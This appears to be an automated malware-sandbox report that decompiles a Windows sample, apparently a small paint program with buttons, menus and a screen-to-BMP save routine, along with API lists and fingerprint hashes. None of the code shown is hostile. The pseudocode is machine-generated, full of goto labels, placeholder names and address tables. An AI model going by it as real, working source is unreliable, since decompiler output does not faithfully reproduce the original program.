                                              				if((_t259 & 0x00000008) != 0) {
                                              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                              				}
                                              				if((_t259 & 0x00000010) != 0) {
                                              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                              				}
                                              				if((_t259 & 0x00000020) != 0) {
                                              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                              				}
                                              				_t172 =  *_t265 & 0x00000c00;
                                              				if(_t172 == 0) {
                                              					 *_a4 =  *_a4 & 0xfffffffc;
                                              				} else {
                                              					if(_t172 == 0x400) {
                                              						_t257 = _a4;
                                              						_t225 =  *_t257 & 0xfffffffd | 1;
                                              						L26:
                                              						 *_t257 = _t225;
                                              						L29:
                                              						_t175 =  *_t265 & 0x00000300;
                                              						if(_t175 == 0) {
                                              							_t250 = _a4;
                                              							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                                              							L35:
                                              							 *_t250 = _t178;
                                              							L36:
                                              							_t179 = _a4;
                                              							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                              							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                              							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                              							if(_a28 == 0) {
                                              								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                              								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                              								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                              								_t254 = _a4;
                                              								_t240 = _a24;
                                              								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                              								 *(_a4 + 0x50) =  *_t240;
                                              							} else {
                                              								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                              								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                              								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                              								_t240 = _a24;
                                              								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                              								 *(_a4 + 0x50) =  *_t240;
                                              							}
                                              							E002F779C(_t254);
                                              							RaiseException(_t262, 0, 1,  &_a4);
                                              							_t256 = _a4;
                                              							if((_t256[2] & 0x00000010) != 0) {
                                              								 *_t265 =  *_t265 & 0xfffffffe;
                                              							}
                                              							if((_t256[2] & 0x00000008) != 0) {
                                              								 *_t265 =  *_t265 & 0xfffffffb;
                                              							}
                                              							if((_t256[2] & 0x00000004) != 0) {
                                              								 *_t265 =  *_t265 & 0xfffffff7;
                                              							}
                                              							if((_t256[2] & 0x00000002) != 0) {
                                              								 *_t265 =  *_t265 & 0xffffffef;
                                              							}
                                              							if((_t256[2] & 0x00000001) != 0) {
                                              								 *_t265 =  *_t265 & 0xffffffdf;
                                              							}
                                              							_t195 =  *_t256 & 0x00000003;
                                              							if(_t195 == 0) {
                                              								 *_t265 =  *_t265 & 0xfffff3ff;
                                              							} else {
                                              								_t206 = _t195 - 1;
                                              								if(_t206 == 0) {
                                              									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                                              									L55:
                                              									 *_t265 = _t209;
                                              									L58:
                                              									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                                              									if(_t199 == 0) {
                                              										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                                              										L64:
                                              										 *_t265 = _t202;
                                              										L65:
                                              										if(_a28 == 0) {
                                              											 *_t240 = _t256[0x14];
                                              										} else {
                                              											 *_t240 = _t256[0x14];
                                              										}
                                              										return _t202;
                                              									}
                                              									_t203 = _t199 - 1;
                                              									if(_t203 == 0) {
                                              										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                                              										goto L64;
                                              									}
                                              									_t202 = _t203 - 1;
                                              									if(_t202 == 0) {
                                              										 *_t265 =  *_t265 & 0xfffff3ff;
                                              									}
                                              									goto L65;
                                              								}
                                              								_t210 = _t206 - 1;
                                              								if(_t210 == 0) {
                                              									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                                              									goto L55;
                                              								}
                                              								if(_t210 == 1) {
                                              									 *_t265 =  *_t265 | 0x00000c00;
                                              								}
                                              							}
                                              							goto L58;
                                              						}
                                              						if(_t175 == 0x200) {
                                              							_t250 = _a4;
                                              							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                                              							goto L35;
                                              						}
                                              						if(_t175 == 0x300) {
                                              							 *_a4 =  *_a4 & 0xffffffe3;
                                              						}
                                              						goto L36;
                                              					}
                                              					if(_t172 == 0x800) {
                                              						_t257 = _a4;
                                              						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                                              						goto L26;
                                              					}
                                              					if(_t172 == 0xc00) {
                                              						 *_a4 =  *_a4 | 0x00000003;
                                              					}
                                              				}
                                              			}























                                              0x002f9b43
                                              0x002f9b4a
                                              0x002f9b4f
                                              0x002f9b55
                                              0x002f9b58
                                              0x002f9b5e
                                              0x002f9b63
                                              0x002f9b68
                                              0x002f9b68
                                              0x002f9b6e
                                              0x002f9b73
                                              0x002f9b78
                                              0x002f9b78
                                              0x002f9b7f
                                              0x002f9b84
                                              0x002f9b89
                                              0x002f9b89
                                              0x002f9b90
                                              0x002f9b95
                                              0x002f9b9a
                                              0x002f9b9a
                                              0x002f9ba1
                                              0x002f9ba6
                                              0x002f9bab
                                              0x002f9bab
                                              0x002f9bb3
                                              0x002f9bc3
                                              0x002f9bd5
                                              0x002f9be7
                                              0x002f9bfa
                                              0x002f9c0c
                                              0x002f9c14
                                              0x002f9c19
                                              0x002f9c1e
                                              0x002f9c1e
                                              0x002f9c25
                                              0x002f9c2a
                                              0x002f9c2a
                                              0x002f9c31
                                              0x002f9c36
                                              0x002f9c36
                                              0x002f9c3d
                                              0x002f9c42
                                              0x002f9c42
                                              0x002f9c49
                                              0x002f9c4e
                                              0x002f9c4e
                                              0x002f9c58
                                              0x002f9c5a
                                              0x002f9c94
                                              0x002f9c5c
                                              0x002f9c61
                                              0x002f9c85
                                              0x002f9c8d
                                              0x002f9c81
                                              0x002f9c81
                                              0x002f9c97
                                              0x002f9c9e
                                              0x002f9ca0
                                              0x002f9cc2
                                              0x002f9cca
                                              0x002f9ccd
                                              0x002f9ccd
                                              0x002f9ccf
                                              0x002f9ccf
                                              0x002f9cda
                                              0x002f9ce0
                                              0x002f9ce5
                                              0x002f9cec
                                              0x002f9d26
                                              0x002f9d31
                                              0x002f9d37
                                              0x002f9d3a
                                              0x002f9d3d
                                              0x002f9d49
                                              0x002f9d51
                                              0x002f9cee
                                              0x002f9cf1
                                              0x002f9cfd
                                              0x002f9d03
                                              0x002f9d09
                                              0x002f9d0c
                                              0x002f9d15
                                              0x002f9d15
                                              0x002f9d54
                                              0x002f9d62
                                              0x002f9d68
                                              0x002f9d6f
                                              0x002f9d71
                                              0x002f9d71
                                              0x002f9d78
                                              0x002f9d7a
                                              0x002f9d7a
                                              0x002f9d81
                                              0x002f9d83
                                              0x002f9d83
                                              0x002f9d8a
                                              0x002f9d8c
                                              0x002f9d8c
                                              0x002f9d93
                                              0x002f9d95
                                              0x002f9d95
                                              0x002f9da2
                                              0x002f9da5
                                              0x002f9ddc
                                              0x002f9da7
                                              0x002f9da7
                                              0x002f9daa
                                              0x002f9dd5
                                              0x002f9dca
                                              0x002f9dca
                                              0x002f9dde
                                              0x002f9de6
                                              0x002f9de9
                                              0x002f9e08
                                              0x002f9e0d
                                              0x002f9e0d
                                              0x002f9e0f
                                              0x002f9e14
                                              0x002f9e20
                                              0x002f9e16
                                              0x002f9e19
                                              0x002f9e19
                                              0x002f9e25
                                              0x002f9e25
                                              0x002f9deb
                                              0x002f9dee
                                              0x002f9dfd
                                              0x00000000
                                              0x002f9dfd
                                              0x002f9df0
                                              0x002f9df3
                                              0x002f9df5
                                              0x002f9df5
                                              0x00000000
                                              0x002f9df3
                                              0x002f9dac
                                              0x002f9daf
                                              0x002f9dc5
                                              0x00000000
                                              0x002f9dc5
                                              0x002f9db4
                                              0x002f9db6
                                              0x002f9db6
                                              0x002f9db4
                                              0x00000000
                                              0x002f9da5
                                              0x002f9ca7
                                              0x002f9cb5
                                              0x002f9cbd
                                              0x00000000
                                              0x002f9cbd
                                              0x002f9cab
                                              0x002f9cb0
                                              0x002f9cb0
                                              0x00000000
                                              0x002f9cab
                                              0x002f9c68
                                              0x002f9c76
                                              0x002f9c7e
                                              0x00000000
                                              0x002f9c7e
                                              0x002f9c6c
                                              0x002f9c71
                                              0x002f9c71
                                              0x002f9c6c

                                              APIs
                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002F9B30,?,?,00000008,?,?,002F97D0,00000000), ref: 002F9D62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: ExceptionRaise
                                              • String ID:
                                              • API String ID: 3997070919-0
                                              • Opcode ID: 59cf017569c3bdb215957b826b62a8c4e812f513eaf837d4b96d471b42013c0a
                                              • Instruction ID: a1519ca17df22fbec47a6ef73b165b0736cc1fcf2738260c49b0699dfd8183d5
                                              • Opcode Fuzzy Hash: 59cf017569c3bdb215957b826b62a8c4e812f513eaf837d4b96d471b42013c0a
                                              • Instruction Fuzzy Hash: 1BB1413152060DDFD715CF28C48AB65BBE0FF493A4F258669E99ACF2A1C335D9A1CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F60F1() {
                                              				signed int _t3;
                                              
                                              				_t3 = GetProcessHeap();
                                              				 *0x305908 = _t3;
                                              				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                              			}




                                              0x002f60f1
                                              0x002f60f9
                                              0x002f6101

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: HeapProcess
                                              • String ID:
                                              • API String ID: 54951025-0
                                              • Opcode ID: 5d07fccdfd1def923123b09d5f5308fd8743d7f83c0d230ed7f47d08d3a6e264
                                              • Instruction ID: 0348ca4710eba9fbfdbde371d6d63423a3ca77eb5dbc190b7f0aa93cb1e7e6e0
                                              • Opcode Fuzzy Hash: 5d07fccdfd1def923123b09d5f5308fd8743d7f83c0d230ed7f47d08d3a6e264
                                              • Instruction Fuzzy Hash: 6FA01230202200CF97014F30694860A379856002E070540395404C0230DB2040809A00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                              • Instruction ID: 8e0fcbd226df310d4391e153934a6cfec96e6121b82c397588fd4d0800eb0793
                                              • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                              • Instruction Fuzzy Hash: 9E11A336A00109EFEB14DBAED88496DF7FDEB89664B554065F809D3214F7709E41C660
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                              • Instruction ID: ac02ad6aa7d316b6712c0deb025884446614535027cdcceab9e81513c4ec143b
                                              • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                              • Instruction Fuzzy Hash: 02E09A397606099FCB48CBA8D880D25B3F8EB4C220B124390FC29C73A0EB34EE01DA50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                              • Instruction ID: 8fc2aa05d1b45a7d73e33fb05755c0c5934803dc7dd36bd7775d251f57bc3fae
                                              • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                              • Instruction Fuzzy Hash: 04E046367115608BC3299A19A480966F3E8EBCC2B171A496AF94AE3B16C330EC02C690
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                              • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                              • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                              • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC670(struct HWND__* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                              				int _v8;
                                              				struct _WNDCLASSW _v48;
                                              				struct _WNDCLASSW _v88;
                                              
                                              				_v48.style = 0;
                                              				_v48.lpfnWndProc = 0;
                                              				_v48.cbClsExtra = 0;
                                              				_v48.cbWndExtra = 0;
                                              				_v48.hInstance = 0;
                                              				_v48.hIcon = 0;
                                              				_v48.hCursor = 0;
                                              				_v48.hbrBackground = 0;
                                              				_v48.lpszMenuName = 0;
                                              				_v48.lpszClassName = 0;
                                              				_v48.lpszClassName = L"Panel";
                                              				_v48.hbrBackground = GetStockObject(0);
                                              				_v48.lpfnWndProc = E002FCD70;
                                              				RegisterClassW( &_v48);
                                              				_v88.style = 0;
                                              				_v88.lpfnWndProc = 0;
                                              				_v88.cbClsExtra = 0;
                                              				_v88.cbWndExtra = 0;
                                              				_v88.hInstance = 0;
                                              				_v88.hIcon = 0;
                                              				_v88.hCursor = 0;
                                              				_v88.hbrBackground = 0;
                                              				_v88.lpszMenuName = 0;
                                              				_v88.lpszClassName = 0;
                                              				_v88.lpszClassName = L"Paper";
                                              				_v88.hbrBackground = GetStockObject(0);
                                              				_v88.lpfnWndProc = E002FCE30;
                                              				RegisterClassW( &_v88);
                                              				_v8 = 0xa;
                                              				CreateWindowExW(0, L"Button", "P", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 1, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				CreateWindowExW(0, L"Button", "S", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 2, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				CreateWindowExW(0, L"Button", "L", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 3, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				CreateWindowExW(0, L"Button", "R", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 4, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				CreateWindowExW(0, L"Button", L"Ci", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 5, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				CreateWindowExW(0, L"Button", "F", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 6, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				 *_a8 = CreateWindowExW(0, L"Panel", 0, 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 0, 0, 0);
                                              				 *_a12 = CreateWindowExW(0, L"Paper", 0, 0x50000000, 0x32, 0xa, 0x1f4, 0x15e, _a4, 0, 0, 0);
                                              				CreateWindowExW(0, L"Button", "<", 0x50000000, 0x32, 0x172, 0x19, 0x19, _a4, 7, 0, 0);
                                              				return CreateWindowExW(0, L"Button", ">", 0x50000000, 0x50, 0x172, 0x19, 0x19, _a4, 8, 0, 0);
                                              			}






                                              0x002fc676
                                              0x002fc67f
                                              0x002fc682
                                              0x002fc685
                                              0x002fc688
                                              0x002fc68b
                                              0x002fc68e
                                              0x002fc691
                                              0x002fc694
                                              0x002fc697
                                              0x002fc69a
                                              0x002fc6a9
                                              0x002fc6ac
                                              0x002fc6b7
                                              0x002fc6bd
                                              0x002fc6c6
                                              0x002fc6c9
                                              0x002fc6cc
                                              0x002fc6cf
                                              0x002fc6d2
                                              0x002fc6d5
                                              0x002fc6d8
                                              0x002fc6db
                                              0x002fc6de
                                              0x002fc6e1
                                              0x002fc6f0
                                              0x002fc6f3
                                              0x002fc6fe
                                              0x002fc704
                                              0x002fc730
                                              0x002fc73c
                                              0x002fc764
                                              0x002fc770
                                              0x002fc798
                                              0x002fc7a4
                                              0x002fc7cc
                                              0x002fc7d8
                                              0x002fc800
                                              0x002fc80c
                                              0x002fc834
                                              0x002fc840
                                              0x002fc86e
                                              0x002fc89f
                                              0x002fc8c7
                                              0x002fc8fc

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CreateWindow$ClassObjectRegisterStock
                                              • String ID: Button$Button$Button$Button$Button$Button$Button$Button$Panel$Panel$Paper$Paper$`H0
                                              • API String ID: 3256756162-2676657579
                                              • Opcode ID: b244ee4955badfd3ea15da68f666ac0b3f861633c72cbfa5cbd3c625bfc10c3a
                                              • Instruction ID: 424faa7f9534653367afee9729ea1560f13470f27dd87e2b3161a5a5f9d683d7
                                              • Opcode Fuzzy Hash: b244ee4955badfd3ea15da68f666ac0b3f861633c72cbfa5cbd3c625bfc10c3a
                                              • Instruction Fuzzy Hash: F281ECB4B80348BFFB11CF95DC56FAE7AB1AB48B05F208119F704BA2D0D6F16A009B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FD400(void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				struct HDC__* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				struct HBITMAP__* _v20;
                                              				void* _v24;
                                              				int _v28;
                                              				intOrPtr _v56;
                                              				intOrPtr _v68;
                                              				intOrPtr _v84;
                                              				char* _v88;
                                              				WCHAR* _v104;
                                              				struct HWND__* _v112;
                                              				struct tagOFNA _v116;
                                              				char _v634;
                                              				char _v636;
                                              				short _t43;
                                              				struct HWND__* _t71;
                                              
                                              				_t86 = __edi;
                                              				_t43 =  *0x30593c; // 0x0
                                              				_v636 = _t43;
                                              				E002F1D00(__edi,  &_v634, 0, 0x206);
                                              				_v28 = 0;
                                              				_v16 = _a8;
                                              				if(_v16 == 1) {
                                              					CreateWindowExW(0, L"button", 0x304ad8, 0x50000000, 5, 5, 0x4b, 0x19, _a4, 1, 0, 0);
                                              				} else {
                                              					if(_v16 == 0x10) {
                                              						DestroyWindow(_a4);
                                              					} else {
                                              						if(_v16 == 0x111) {
                                              							_t71 =  *0x3059b4; // 0x0
                                              							_v8 = GetDC(_t71);
                                              							_v12 = CreateCompatibleDC(_v8);
                                              							_v20 = CreateCompatibleBitmap(_v8, 0x1f4, 0x15e);
                                              							_v24 = SelectObject(_v12, _v20);
                                              							BitBlt(_v12, 0, 0, 0x1f4, 0x15e, _v8, 0, 0, 0xcc0020);
                                              							SelectObject(_v12, _v24);
                                              							DeleteObject(_v8);
                                              							DeleteObject(_v12);
                                              							E002F1D00(_t86,  &_v116, 0, 0x58);
                                              							_v116 = 0x58;
                                              							_v112 = _a4;
                                              							_v104 = L"Bmp File(*Bmp)";
                                              							_v88 =  &_v636;
                                              							_v84 = 0x104;
                                              							_v56 = 0x304b34;
                                              							_v68 = 0x304b40;
                                              							if(GetOpenFileNameW( &_v116) != 0) {
                                              								E002FB350(_v20, _v88);
                                              							}
                                              							DeleteObject(_v20);
                                              						}
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}




















                                              0x002fd400
                                              0x002fd409
                                              0x002fd40f
                                              0x002fd424
                                              0x002fd42c
                                              0x002fd436
                                              0x002fd43d
                                              0x002fd47a
                                              0x002fd43f
                                              0x002fd443
                                              0x002fd57e
                                              0x002fd449
                                              0x002fd450
                                              0x002fd485
                                              0x002fd492
                                              0x002fd49f
                                              0x002fd4b6
                                              0x002fd4c7
                                              0x002fd4e9
                                              0x002fd4f7
                                              0x002fd501
                                              0x002fd50b
                                              0x002fd519
                                              0x002fd521
                                              0x002fd52b
                                              0x002fd52e
                                              0x002fd53b
                                              0x002fd53e
                                              0x002fd545
                                              0x002fd54c
                                              0x002fd55f
                                              0x002fd569
                                              0x002fd569
                                              0x002fd572
                                              0x002fd572
                                              0x002fd450
                                              0x002fd443
                                              0x002fd59d

                                              APIs
                                              • CreateWindowExW.USER32 ref: 002FD47A
                                              • GetDC.USER32(00000000), ref: 002FD48C
                                              • CreateCompatibleDC.GDI32(?), ref: 002FD499
                                              • CreateCompatibleBitmap.GDI32(?,000001F4,0000015E), ref: 002FD4B0
                                              • SelectObject.GDI32(?,?), ref: 002FD4C1
                                              • BitBlt.GDI32(?,00000000,00000000,000001F4,0000015E,?,00000000,00000000,00CC0020), ref: 002FD4E9
                                              • SelectObject.GDI32(?,?), ref: 002FD4F7
                                              • DeleteObject.GDI32(?), ref: 002FD501
                                              • DeleteObject.GDI32(?), ref: 002FD50B
                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 002FD557
                                              • DeleteObject.GDI32(?), ref: 002FD572
                                              • DestroyWindow.USER32(?), ref: 002FD57E
                                              • DefWindowProcW.USER32(?,00000001,?,?), ref: 002FD594
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Object$CreateDeleteWindow$CompatibleSelect$BitmapDestroyFileNameOpenProc
                                              • String ID: Bmp File(*Bmp)$X$bmp$button
                                              • API String ID: 2517243105-3907938070
                                              • Opcode ID: 8e351130efeec61648f2ed0fbb18562ae1848318521fafc9f96196b05ed8b7a4
                                              • Instruction ID: c10537d6c6a7636b83f40705adc118003bd9f99f614a95a35bcade4454d79bf8
                                              • Opcode Fuzzy Hash: 8e351130efeec61648f2ed0fbb18562ae1848318521fafc9f96196b05ed8b7a4
                                              • Instruction Fuzzy Hash: C7410AB5A50208EBDB14DFA0DC59FBEB7B5AB48741F108528FB05AB290DBB59A00CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC900(struct HWND__* _a4) {
                                              				struct HMENU__* _v8;
                                              				struct HMENU__* _v12;
                                              				struct HMENU__* _v16;
                                              				struct HMENU__* _v20;
                                              
                                              				_v16 = CreateMenu();
                                              				_v20 = CreateMenu();
                                              				_v8 = CreateMenu();
                                              				_v12 = CreateMenu();
                                              				AppendMenuW(_v20, 0, 0xa, 0x304780);
                                              				AppendMenuW(_v20, 0, 0xb, 0x30478c);
                                              				AppendMenuW(_v8, 0, 0xc, 0x304798);
                                              				AppendMenuW(_v8, 0, 0xd, 0x3047ac);
                                              				AppendMenuW(_v8, 0, 0xe, 0x3047c0);
                                              				AppendMenuW(_v8, 0x800, 0, 0);
                                              				AppendMenuW(_v8, 0, 1, 0x3047cc);
                                              				AppendMenuW(_v8, 0, 1, 0x3047dc);
                                              				AppendMenuW(_v12, 0, 3, 0x3047f0);
                                              				AppendMenuW(_v12, 0, 1, 0x304808);
                                              				AppendMenuW(_v12, 0, 0xf, 0x304818);
                                              				AppendMenuW(_v16, 0x10, _v20, 0x30482c);
                                              				AppendMenuW(_v16, 0x10, _v12, 0x304838);
                                              				AppendMenuW(_v16, 0x10, _v8, 0x304848);
                                              				return SetMenu(_a4, _v16);
                                              			}







                                              0x002fc90c
                                              0x002fc915
                                              0x002fc91e
                                              0x002fc927
                                              0x002fc937
                                              0x002fc94a
                                              0x002fc95d
                                              0x002fc970
                                              0x002fc983
                                              0x002fc996
                                              0x002fc9a9
                                              0x002fc9bc
                                              0x002fc9cf
                                              0x002fc9e2
                                              0x002fc9f5
                                              0x002fca0a
                                              0x002fca1f
                                              0x002fca34
                                              0x002fca4b

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Menu$Append$Create
                                              • String ID:
                                              • API String ID: 508680711-0
                                              • Opcode ID: d56284e506ee990aae235beb6f46758a1c52f0257b7e0cb193e9b9f86cd032c9
                                              • Instruction ID: 4e4399401736d2d8082761ab7defd37d6f88db0f9f50055c06793ba720eebf12
                                              • Opcode Fuzzy Hash: d56284e506ee990aae235beb6f46758a1c52f0257b7e0cb193e9b9f86cd032c9
                                              • Instruction Fuzzy Hash: A041F175A80304BBDB119BE1EC6EFBF7B35BB54B51F014958F319AA1E0C6B19A00CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FD620(void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              
                                              				_v8 = _a8;
                                              				if(_v8 == 1) {
                                              					CreateWindowExW(0, L"button", L"32px", 0x50000000, 0x32, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              					CreateWindowExW(0, L"button", L"64px", 0x50000000, 0x55, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              					CreateWindowExW(0, L"button", L"128px", 0x50000000, 0x73, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              					CreateWindowExW(0, L"button", L"256px", 0x50000000, 0x96, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              				} else {
                                              					if(_v8 == 0x10) {
                                              						DestroyWindow(_a4);
                                              					} else {
                                              						if(_v8 == 0x111) {
                                              							DestroyWindow(_a4);
                                              						}
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}




                                              0x002fd627
                                              0x002fd62e
                                              0x002fd66f
                                              0x002fd698
                                              0x002fd6c1
                                              0x002fd6ed
                                              0x002fd630
                                              0x002fd634
                                              0x002fd705
                                              0x002fd63a
                                              0x002fd641
                                              0x002fd6f9
                                              0x002fd6f9
                                              0x002fd641
                                              0x002fd634
                                              0x002fd724

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp Download File
